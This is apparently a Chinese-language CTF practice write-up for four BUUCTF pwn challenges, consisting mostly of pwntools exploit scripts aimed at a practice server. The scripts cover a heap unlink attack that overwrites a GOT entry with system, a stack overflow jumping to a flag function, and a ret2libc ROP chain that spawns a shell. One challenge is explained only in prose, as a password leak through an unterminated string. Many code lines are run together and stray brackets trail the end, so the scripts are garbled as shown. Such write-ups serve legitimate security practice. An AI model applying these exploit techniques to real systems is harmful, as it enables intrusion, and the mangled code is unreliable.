PWN-PRACTICE-BUUCTF-22
- hitcontraining_unlink
- picoctf_2018_leak_me
- suctf_2018_basic pwn
- axb_2019_brop64
hitcontraining_unlink
unlink,参考:[BUUCTF]PWN——hitcontraining_unlink
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./bamboobox")
io=remote("node4.buuoj.cn",25178)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")def show():io.sendlineafter("Your choice:","1")
def add(name_len,name):io.sendlineafter("Your choice:","2")io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the name of item:",name)
def edit(index,name_len,name):io.sendlineafter("Your choice:","3")io.sendlineafter("the index of item:",str(index))io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the new name of the item:",name)
def free(index):io.sendlineafter("Your choice:","4")io.sendlineafter("the index of item:",str(index))
def exit():io.sendlineafter("Your choice:","5")#gdb.attach(io)
#pause()add(0x40,"aaaa")
add(0x80,"bbbb")
add(0x80,"cccc")#pause()ptr=0x00000000006020C8
fd=ptr-0x18
bk=ptr-0x10
payload=p64(0)+p64(0x40)+p64(fd)+p64(bk)
payload=payload.ljust(0x40,"A")
payload+=p64(0x40)+p64(0x90)
edit(0,len(payload),payload)#pause()free(1)#pause()atoi_got=elf.got["atoi"]
payload=p64(0)*2+p64(0x40)+p64(atoi_got)
edit(0,len(payload),payload)#pause()show()
io.recvuntil("0 : ")
atoi_addr=u64(io.recv(6).ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]#pause()edit(0,0x08,p64(system))#pause()io.sendlineafter("Your choice:","/bin/sh\x00")io.interactive()picoctf_2018_leak_me
v5字符数组大小为256,在后面高地址处跟着的是s字符数组,程序会读取password.txt到s
后面有一句puts(v5),puts遇到"\x00"才会停止打印
将v5的256个字符全部填充为"a",没有回车"\n",就不会在结尾设置"\x00"
puts(v5)的时候就可以将password打印出来
再次nc到服务器,输入正确的密码即可得到flag
suctf_2018_basic pwn
栈溢出
from pwn import *
#io=process('./SUCTF_2018_basic_pwn')
io=remote('node4.buuoj.cn',26502)
flag_addr=0x401157
payload='a'*(0x110+8)+p64(flag_addr)
io.sendline(payload)
io.interactive()
axb_2019_brop64
栈溢出,ret2libc
from pwn import *
context.log_level="debug"
#io=process('./axb_2019_brop64')
io=remote('node4.buuoj.cn',29347)
elf=ELF('./axb_2019_brop64')
libc=ELF('./libc-2.23-x64.so')
main=0x4007d6
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400963 io.recvuntil('Please tell me:')
payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendline(payload)puts_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=puts_addr-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()io.recvuntil('Please tell me:')
payload='a'*0xd8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
io.sendline(payload)io.interactive()
)
)
